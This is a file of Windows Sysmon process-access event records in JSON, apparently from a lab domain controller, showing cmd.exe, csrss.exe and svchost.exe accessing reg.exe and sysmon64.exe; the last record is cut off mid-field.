{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2697,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01F2-5F25-0000-001097D50400}\r\nSourceProcessId: 5044\r\nSourceThreadId: 5048\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01F2-5F25-0000-001057D60400}\r\nTargetProcessId: 5056\r\nTargetImage: C:\\Windows\\system32\\reg.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01F2-5F25-0000-001097D50400}","SourceProcessId":"5044","SourceThreadId":"5048","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01F2-5F25-0000-001057D60400}","TargetProcessId":"5056","TargetImage":"C:\\Windows\\system32\\reg.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2698,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01F2-5F25-0000-001057D60400}\r\nTargetProcessId: 5056\r\nTargetImage: C:\\Windows\\system32\\reg.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01F2-5F25-0000-001057D60400}","TargetProcessId":"5056","TargetImage":"C:\\Windows\\system32\\reg.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2699,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2700,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2701,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2702,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2703,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2704,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2705,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 